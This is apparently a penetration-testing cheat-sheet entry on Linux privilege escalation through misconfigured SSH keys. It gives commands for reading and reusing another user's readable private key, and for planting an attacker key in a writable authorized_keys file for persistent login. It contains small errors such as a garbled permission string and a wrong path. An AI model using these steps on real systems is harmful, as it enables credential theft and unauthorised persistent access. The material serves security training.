| description |
|---|
This is a crucial step in post compromise. It also allows for the best-case-scenario shell. |
ls -la /home /root /etc/ssh /home/*/.ssh/; /etc/ssh:
-rwxrwxtwx 1 stef stef 565 Feb 16 01:28 id_rsa- If you see the following permissions, the private keys are readable and you can then hijack them:
-
cd /.ssh
-
cat id_rsa
-
copy/paste contents of id_rsa into a file in a directory named after the individual’s name you are stealing the key from.
-
nano id_rsa and paste the contents of id_rsa into here.
-
chmod 600 id_rsa
-
SSH into the machine using the following syntax:
ssh -i id_rsa <user>@<IP>
- If the authorized_keys file is writable to the current user, this can be exploited by adding additional authorized keys.
ls -la /home /root /etc/ssh /home/*/.ssh/; /etc/ssh:
-rwxrwxrwx 1 stef stef 565 Feb 16 01:58 authorized_keys- The easiest way to exploit this is to generate a new SSH key pair, add the public key to the file and login using the private key.
# On kali:
ssh-keygen
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa.pub | xclip -selection cCopy the public key to the host:
# On victim:
echo "ssh-rsa <pub_key_here>= kali@kali" >> /home/user/.ssh/authorized_keys
cat /home/user/.ssh/authorized_keysConnect to the victim via SSH:
ssh user@<IP>- Note that if the key pair was not generated in the default directory for SSH, the private key can be specified using -i.
https://steflan-security.com/linux-privilege-escalation-exploiting-misconfigured-ssh-keys/